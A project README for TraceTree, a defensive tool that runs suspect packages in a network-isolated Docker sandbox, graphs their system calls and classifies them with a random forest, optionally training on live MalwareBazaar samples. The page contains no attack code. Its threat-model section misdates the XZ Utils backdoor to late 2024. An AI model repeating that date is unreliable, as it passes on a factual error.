TraceTree
TraceTree - Runtime behavioral analysis tool that maps the process cascade of suspicious packages into a directed tree, catching supply chain attacks that install-time scanners miss.
Install / Use
/learn @tejasprasad2008-afk/TraceTreeREADME
TraceTree
Runtime behavioral analysis for Python packages, npm modules, DMG and EXE files — catching supply chain attacks that install-time scanners miss.

How It Works
TraceTree executes suspicious packages inside an isolated Docker sandbox. Right after the initial download starts, it drops the container's network interface. This safely triggers and logs malicious outbound connection attempts without actually letting traffic escape.
A regex engine parses the strace output, tracks system calls (like clone, execve, socket, and openat), and builds a directed graph using NetworkX. Finally, a RandomForestClassifier trained on known malware evaluates the graph's topology to detect anomalous behavior.
Installation
You need Python 3.9+ and Docker running on your machine.
git clone https://github.com/tejasprasad2008-afk/TraceTree.git
cd TraceTree
# Install the CLI tool in editable mode
pip install -e .
Usage
The pipeline is controlled via a Typer CLI.
# Analyze a PyPI package
cascade-analyze requests
# Evaluate standard dependency files
cascade-analyze requirements.txt
cascade-analyze package.json
# Analyze compiled installers
cascade-analyze malicious_app.dmg
cascade-analyze payload.exe
Advanced Training & Dataset Ingestion
TraceTree features an Online Training Pipeline that can fetch live malware samples from MalwareBazaar.
Local Training
If you want to train the model locally using the datasets in data/:
# Start the interactive training pipeline
cascade-train
During cascade-train, you will be prompted for a MalwareBazaar Auth Key. If provided, the tool will:
- Ingest: Fetch the latest malicious Python samples from MalwareBazaar.
- Sandbox: Run them through the Docker pipeline to extract fresh behavioral footprints.
- Train: Re-calculate the Random Forest weights to include the new data.
- Sync: Automatically cache the new model locally.
Model Synchronization
To fetch the latest pre-trained model directly from the global cloud storage:
# Force download the latest global model
cascade-update
Who Is This For
- Security Researchers: Hunting undocumented supply chain behavior.
- DevOps / DevSecOps: Validating the runtime safety of injected dependencies.
- Software Engineers: Profiling the exact syscall requirements of applications.
Architecture
The pipeline is split into 5 core modules:
/sandbox: Manages the Docker container lifecycle and actively restricts networking during testing./monitor: Parses thestracelog to track execution paths and network attempts./graph: Usesnetworkxto translate parent/child process relationships into an edge graph./ml: Feeds the extracted graph features into aRandomForestClassifierfor anomaly detection./cli: The Typer entrypoint that orchestrates the pipeline and renders the terminal UI.

Threat Model
In late 2024, the highly obfuscated XZ Utils backdoor bypassed standard static scanning. Advanced supply chain malware often hides malicious operations deep within legitimate-looking test code or delayed payload fetches. By analyzing the runtime execution graph, TraceTree bypasses code obfuscation entirely to see exactly what external files, commands, and sockets a package actually tries to open.
Contributing
Pull requests are welcome. Please ensure new features remain decoupled across the existing architecture.
License
MIT
Related Skills
node-connect
343.1kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
frontend-design
90.0kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
openai-whisper-api
343.1kTranscribe audio via OpenAI Audio Transcriptions API (Whisper).
qqbot-media
343.1kQQBot 富媒体收发能力。使用 <qqmedia> 标签,系统根据文件扩展名自动识别类型(图片/语音/视频/文件)。
